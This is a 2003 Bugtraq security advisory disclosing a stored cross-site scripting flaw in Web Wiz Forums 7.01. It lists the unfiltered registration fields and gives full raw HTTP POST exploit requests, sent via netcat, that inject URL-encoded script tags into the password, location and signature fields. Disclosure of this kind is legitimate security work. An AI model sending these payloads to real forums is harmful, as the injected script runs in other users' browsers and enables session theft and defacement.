[32428] in bugtraq
Web Wiz Forums ver. 7.01
daemon@ATHENA.MIT.EDU (HEX)
Thu Nov 13 17:24:21 2003
Date: Thu, 13 Nov 2003 22:37:23 +0300
From: HEX <hex@hex.net.ru>
Reply-To: HEX <hex@hex.net.ru>
Message-ID: <6520144396.20031113223723@hex.net.ru>
To: bugtraq@securityfocus.com, info@webwizguide.info
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Website : http://www.webwizforums.com
Problems : Permanent XSS
Objects :
°°°°°°°
- register_new_user.asp
- register.asp
The values variable are not filtered:
strLocation = Request.Form("location")
strMessage = Request.Form("signature")
strPassword = Request.Form("password")
Exploits :
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=">[CODE]
password2=">[CODE]
email=support%40microsoft.com
emailShow=True
location=">[CODE]
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=">[CODE]
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF
P.S. The value NAME should coincide with whose that by a nick from a forum !!!
Example:
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
email=support%40microsoft.com
emailShow=True
location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF
Patch/More Details :
°°°°°°°°°°°°°°°°°°
There was no opportunity to check up it on the version 7.5 and 7.51 :(
Waiting for the reply from technical support at http://www.webwizforums.com ...
[ Local time 21:50 | Ïpîêëÿòàÿ éöóêåí, è êàê ñ íåé òîëüêî ëþäè æèâóò... ]
[ Copyright by [HEX] | mailto:hex@hex.net.ru ]
